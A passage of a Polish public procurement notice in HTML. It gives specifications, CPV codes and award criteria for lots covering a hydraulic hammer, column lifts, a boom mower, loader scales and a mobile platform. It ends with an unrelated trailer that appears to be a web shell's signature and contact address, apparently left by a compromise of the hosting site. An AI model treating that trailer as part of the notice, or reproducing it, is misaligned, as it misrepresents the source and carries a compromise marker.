<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin dostawy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa młota udarowego do koparko - ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowego młota udarowego - 1 szt. o poniższych minimalnych parametrach i wyposażeniu: 

- Energia uderzenia: 981 J
- Max częstotliwość: 900 c/min
- Max przepływ oleju: 40-80 l/min
- Max masa robocza: 330 kg
- Urządzenie kompatybilne z maszyną Zamawiającego koparko-ładowarka JCB 3CX ECO 
- Certyfikat CE , pełna dokumentacja DTR i instrukcja obsługi w języku polskim,

Przedmiot zamówienia obejmuje dostawę, montaż w koparko-ładowarce dodatkowej instalacji hydraulicznej do obsługi młota oraz szkolenie personelu z obsługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.51.26.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin dostawy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mobilnego podnośnika kolumnowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowego mobilnego podnośnika kolumnowego w ilości 4 szt. o poniższych minimalnych parametrach i wyposażeniu: 

- Udźwig łączny min. 28000 kg
- Wysokość podnoszenia: min 1800 mm,
- Długość wideł: min. 300 mm,
- Napęd: elektro - hydrauliczny,
- Zasilanie: max 400V/16A
- Średnica koła: min 16 cali - max. 22,5 cala/ regulowany rozstaw wideł,
- Mechanizm podnoszenia: wisząco ułożyskowana śruba napędowa z trapezowym gwintem i z samohamującą nakrętką z brązu,
- Układ hydrauliczny - samo-smarowny,
- Mobilne kolumny podnośnika w obudowie umożliwiającej przemieszczanie przez 1 pracownika,
- Możliwość używania w pomieszczeniach jak i na zewnątrz (odporne na warunki atmosferyczne),
- Możliwość awaryjnego opuszczenia pojazdu w przypadku braku zasilania oraz  min. 2 zabezpieczenia przed samoistnym opuszczeniem pojazdu
- Podwójne zabezpieczenie przeciążeniowe silników,
- Zsynchronizowany (elektroniczny) ruch kolumn,
- kolumna sterująca z głównym panelem kontrolnym z opcjami sterowania: jednoczesna praca wszystkich kolumn  oraz jednoczesna praca 1 lub więcej par kolumn,
- Badanie i dopuszczenie urządzenia w UDT (o ile dotyczy), 
- Certyfikat CE , pełna dokumentacja DTR i instrukcja obsługi w języku polskim,

Przedmiot zamówienia obejmuje dostawę, montaż, oraz szkolenie personelu Zamawiającego z obsługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.32.62.00-0, 42.41.70.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin dostawy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa kosiarki wysięgnikowej do ciągnika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowej kosiarki wysięgnikowej - 1 szt. o poniższych minimalnych parametrach i wyposażeniu: 
- Zasięg pracy (poziomy) wysięgnika z głowicą koszącą wynoszący min. 6-6,5 m od osi ciągnika, wraz z wysuwem dodatkowego ramienia min. 0,8 m,
- Wysięgnik sterowany z kabiny operatora mechanicznie lub elektrycznie, 
- Możliwość pracy ramienia w poziomie - min. 95°
- Dwa kierunki obrotu wału głowicy sterowane z kabiny operatora,
- Pompa hydrauliczna główna o pojemności min: 73 cm3
- Moc układu hydraulicznego ramienia: min 65 KM,
- Połączenia hydrauliczne: sucho odcinające,
- Wysokość i szerokość transportowa oraz waga zestawu: dostosowana do ciągnika Zamawiającego Crystal Orion 13.4,
- Głowica zamocowana wahliwie na ramieniu
- Napęd: hydrauliczny
- Zbiornik oleju hydraulicznego: min. 200 l z chłodnicą oraz elektronicznym regulatorem temperatury - niezależnie od układu hydraulicznego ciągnika
- Zabezpieczenie obrotu ramienia - amortyzator gazowo - hydrauliczny,
- Zabezpieczenie płynnej pracy ramienia - amortyzator gazowo - hydrauliczny,
- Konstrukcja ramienia kosiarki: sztywna, połączona nierozerwalnie ze zbiornikiem, ramię wykonane w całości z profilu zamkniętego o min. przekroju 120x120 mm
- Szerokość robocza głowicy min. 1100 mm
- Głowica wyposażona w noże młotkowe/noże tnące, przystosowana do montażu na ramieniu objętym specyfikacją,
- Moc na wale tnącym: min. 50 KM,
- Obroty wału tnącego: min. 3000 obr./min
- Regulacja wysokości cięcia w dwóch położeniach,
- Możliwość zwiększenia zasięgu roboczego ramienia,
- Ciężar zestawu (głowica + ramię) max. 1500 kg,
- Certyfikat CE , pełna dokumentacja DTR i instrukcja obsługi w języku polskim,

Przedmiot zamówienia obejmuje dostawę, montaż kosiarki na ciągniku Zamawiającego oraz szkolenie personelu z obsługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin dostawy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa wag do ładowarek kołowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowych wag do ładowarek kołowych w ilości 2 szt. o poniższych minimalnych parametrach i wyposażeniu: 
 
- Zakres ważenia: od 200 kg,
- Działka legalizacyjna: max. 20 kg przy nośności max. 5000 kg,
- Zasilanie: 24 V
- Zakres temperatur pracy: -25° do +40°
- Wyświetlacz LCD, dotykowy o przekątnej max. 6 cali,
- Waga oparta na czujnikach ciśnienia,
- Moduł z czujnikiem położenia ramienia ładowarki,
- Moduł z  czujnikiem położenia łyżki,
- Moduł pomiarowy z wbudowanym czujnikiem przechyłu,
- Okablowanie specjalistyczne z montażem okablowania w osłonach ochronnych o szczelności w klasie IP64,
- Drukarka paragonowa z zapasem rolek - 30 szt.,
- Dodatkowa klawiatura USB,
- Kamera cofania,
- Port USB do przenoszenia danych z ważenia,
- Możliwość wprowadzenia do pamięci urządzenia między innymi: nazwy przedsiębiorstwa, rodzaju materiału, datę, godzinę, masę towaru załadowanego, ilość łyżek, nazwisko operatora, odbiorcę, wydruk raportu dziennego,
- Pamięć na min 10000 kompletnych ważeń,
- 4 pozycje pamięci do dowolnej konfiguracji,
- Przez czas trwania gwarancji dostawa bezpłatnej subskrypcji oprogramowania wagowego,
- Certyfikat CE i instrukcja obsługi w języku polskim,

Przedmiot zamówienia obejmuje dostawę, montaż, kalibrację oraz szkolenie personelu Zamawiającego z obsługi wag..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.92.30.00-2, 42.92.31.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin dostawy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa mobilnego podestu o napędzie elektrycznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowego mobilnego podestu - 1 szt. o poniższych minimalnych parametrach i wyposażeniu: 

- Wysokość robocza - min. 11,5 m,
- Wysokość platformy - min. 10 m,
- Platforma rozsuwana - min. 0,90 m,
- Zasilanie - elektryczne,
- Udźwig - min. 310 kg,
- Wysokość transportowa - min. 1,99 m,
- Szerokość - min. 0,9 m, max. 1,1 m,
- Długość - min. 2,45 m,
- Zewnętrzny promień skrętu - 2,20 m,
- Masa własna - max. 2900 kg,
- Zdolność pokonywania wzniesień - min. 25%,
- Pełny skręt kół - 90 stopni,
- Sygnalizacja przechyłu bocznego,
- Baterie 24V/24 Ah z możliwością łatwego dostępu dla obsługi,
- Wbudowany prostownik,
- Lampa błyskowa (kogut),
- Joystick sterowniczy zabezpieczony przed uszkodzeniem,
- Możliwość jazdy z max podniesioną platformą,
- Badanie i dopuszczenie urządzenia w UDT,
- Certyfikat CE,
- Pełna dokumentacja DTR i instrukcja obsługi w języku polskim,

Przedmiot zamówienia obejmuje uruchomienie podestu w miejscu dostawy oraz szkolenie personelu Zamawiającego z obsługi podestu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.41.70.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin dostawy - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com